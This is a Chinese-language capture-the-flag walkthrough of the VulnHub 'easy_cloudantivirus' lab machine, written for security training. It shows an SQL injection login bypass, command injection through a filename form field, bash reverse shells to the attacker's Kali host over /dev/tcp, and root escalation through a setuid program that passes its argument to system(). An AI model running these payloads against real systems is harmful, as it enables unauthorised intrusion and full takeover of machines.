靶機: easy_cloudantivirus
靶機: easy_cloudantivirus
準備
-
下載靶機(Target)://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
-
靶機推薦使用 VirtualBox 導入,注意以下兩個設置
- 顯示 –> 顯卡控制器 –>
VMSVGA - USB 設備 –>
USB 1.1 (OHCI) 控制器
- 顯示 –> 顯卡控制器 –>
-
配置網絡環境://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
- 靶機: Host-Only
完成上面內容後,需要對 kali 與 target 做 快照記錄 當前環境和布置,以免實驗過程中出現錯誤造成不可挽回的損失
打靶流程
發現目標
此過程一般使用 Kali 中掃描工具 arp-scan, nmap, Fping, Nping, Arping, Nbtscan, …
一般推薦 arp-scan 使用簡單
-
使用
sudo arp-scan -l -I eth1尋找目標,發現目標192.168.56.109┌──(kali㉿kali)-[~] └─$ sudo arp-scan -l -I eth1 127 ⨯ Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111 Starting arp-scan 1.9.8 with 256 hosts (//github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered) 192.168.56.100 08:00:27:4d:8e:be PCS Systemtechnik GmbH 192.168.56.109 08:00:27:17:f5:a8 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded- 在 arp-scan 中參數
-I是--interface=簡寫作用是指定掃描的接口,如果沒有默認掃描 eth0 - 在不知道網段使用
-l參數,當然也可以直接填寫需要掃描的網段 - 應當核實第一步,可以在 VirtualBox 上查看靶機的 MAC 地址與上面的目標是否相同,這一步也是驗證前面準備時的配置是否有用
- 在 arp-scan 中參數
-
使用 nmap 對目標進行端口掃描,一個經典的 nmap 掃描命令
nmap -A -T4 192.168.56.109即可┌──(kali㉿kali)-[~] └─$ nmap -A -T4 192.168.56.109 1 ⨯ Starting Nmap 7.93 ( //nmap.org ) at 2022-10-23 14:29 CST Nmap scan report for 192.168.56.109 Host is up (0.0011s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA) | 256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA) |_ 256 7190c326ba3be8b3537e7353274d6baf (ED25519) 8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1) |_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1 |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at //nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds-
參數
-A用來進行操作系統及其版本的探測 -
參數
-T4可以加快執行速度 -
從掃描結果我們可以得到以下信息
- 操作系統 OS 是 Linux
- 開放了兩個端口 22/tcp(ssh: OpenSSH 7.6p1 Ubuntu 4), 8080/tcp(http: Werkzeug httpd 0.14.1)
-
注入測試
對於 ssh 目前沒有頭緒,我們可以嘗試訪問其開發的 http 服務
-
使用瀏覽器訪問
//192.168.56.109:8080/,是一個普通網頁,我們可以在網頁中查看源碼<html> <body> <h1>Cloud Anti-Virus Scanner!</h1> <h2>This is a beta Cloud Anti-Virus Scanner service.</h2> <h3>Please enter your invite code to start testing</h3> <form action="/login" method="POST"> <input type="text" name="password" placeholder="Invite Code"> <input type="submit" value="Log in"> </form> </body> </html>- 通過源碼分析,發現一個以 POST 方式提交的表單,其中只有一個名為 password 的數據
- 表單提交指向
/login網頁,我們可以大致推理出,這個表單提交的數據是用於登錄 - 此處可以嘗試進行注入測試
-
在網站這發現網頁內容中查找可能的注入點,我們可以使用
sqlmap進行測試- 新建一個文件 target.txt
- 使用 Kali 的 Firefox-ESR 在頁面
//192.168.56.109:8080/使用 Ctrl + Shift + I 打開 Web 開發者工具 - Web 開發者工具中的網絡工具對頁面
//192.168.56.109:8080/login設置攔截 - 在頁面
//192.168.56.109:8080/發送上面表單的 POST 請求 - 複製攔截的該請求的請求頭和請求數據到 target.txt 文件中
- 使用命令
sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali㉿kali)-[~/workspace] └─$ sqlmap -r testsql.txt -f --level 4 --risk 3 ___ __H__ ___ ___[']_____ ___ ___ {1.6.10#stable} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| //sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:18:43 /2022-10-23/ [15:18:43] [INFO] parsing HTTP request from 'testsql.txt' [15:18:43] [INFO] testing connection to the target URL [15:18:44] [INFO] testing if the target URL content is stable [15:18:44] [INFO] target URL content is stable [15:18:44] [INFO] testing if POST parameter 'password' is dynamic [15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic [15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable [15:18:45] [INFO] testing for SQL injection on POST parameter 'password' [15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y [15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)' [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable [15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y [15:19:14] [INFO] testing 'Generic inline queries' [15:19:14] [INFO] testing 'SQLite inline queries' [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)' [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)' [15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)' [15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)' [15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable [15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found- 從中可以看出存在注入點,並且 DBMS 可能是 SQLite
- 並且從
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable可以看出注入類型OR boolean-based
-
構造 SQL 注入語句,已知注入類型
OR boolean-based可以嘗試比較通用的語句" or 1=1--做為頁面//192.168.56.109:8080/中表單的password值進行提交表單
到目前為止,我們成功登錄 //192.168.56.109:8080/scan 頁面,通過簡單的探索發現此頁面是這個 Web 應用的後台管理頁面,
其中存在數據提交,但通過關鍵詞 Try scanning some of these files with our scanner! 知道傳入的數據是被某種程序進行查殺,更多的是涉及 shell 中執行
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
我們可以嘗試使用 | 管道進行命令串聯,改變回返的數據內容,並夾雜我們想要的信息
-
輸入嘗試
a | id得到了下面結果,這說明其中的數據沒有過濾,我們可以通過這個執行命令uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
反彈 shell
-
通過這個漏洞,我們可以構建一個
a | ls | grep 'xxxxx' | 想要執行的命令-
我們可以查看是否存在
wget有助於木馬上傳,配合 metasploit 攻擊 -
也可以使用 nc 反彈 shell 依次執行下面命令,但上面的 nc 版本不利於反彈,也可以使用 nc 實現但比較麻煩
-
nc 上傳 bash 反彈木馬程序
- 表單提交
a | ls | grep 'xxxxx' | touch a.sh - 表單提交
a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh - 在 kali 執行
nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1' - 在 kali 執行
netcat -lvp 23333監聽端口 - 表單提交
a | ls | grep 'xxxxx' | bash a.sh反彈 shell
- 表單提交
┌──(kali㉿kali)-[~/workspace] └─$ netcat -lvp 23333 listening on [any] 23333 ... 192.168.56.109: inverse host lookup failed: Unknown host connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396 bash: cannot set terminal process group (694): Inappropriate ioctl for device bash: no job control in this shell scanner@cloudav:~/cloudav_app$ ls ls app.py a.sh database.sql get-pip.py get-pip.py.1 get-pip.py.2 get-pip.py.3 samples templates scanner@cloudav:~/cloudav_app$- 成功反彈 shell
-
本質上此用戶 scanner 的可行動服務就非常高,隨便的方法都能攻破【不在進行其他 shell 反彈演示,有需求自行查找】
探索目標
我們已經進入目標的內部,我們探索一下目錄、文件
-
我們在用戶根目錄發現一個有特殊權限的文件
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudavscanner@cloudav:~$ ls -alh ls -alh total 60K drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 . drwxr-xr-x 4 root root 4.0K Oct 21 2018 .. -rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history -rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout -rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local -rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile -rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav -rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c- 在linux中,
-s指的是強制位權限,具有程序運行時子進程權限繼承,s 權限位是一個敏感的權限位,容易造成系統的安全問題 - 其中還含有源碼 update_cloudav.c 我們可以查看源碼,發現執行此命令需要一個參數,我們完全可以故技重施
#include <stdio.h> int main(int argc, char *argv[]) { char *freshclam="/usr/bin/freshclam"; if (argc < 2){ printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n"); return 1; } char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2); sprintf(command, "%s %s", freshclam, argv[1]); setgid(0); setuid(0); system(command); return 0; } - 在linux中,
-
獲取 root 權限
- Kali 設置
netcat -lvp 4444監聽 4444 端口 - 靶機上 shell 反彈
touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"
┌──(kali㉿kali)-[~] └─$ netcat -lvp 4444 listening on [any] 4444 ... 192.168.56.109: inverse host lookup failed: Unknown host connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672 bash: cannot set terminal process group (694): Inappropriate ioctl for device bash: no job control in this shell root@cloudav:~# id id uid=0(root) gid=0(root) groups=0(root),1001(scanner) - Kali 設置
遊戲結束 GAMEOVER
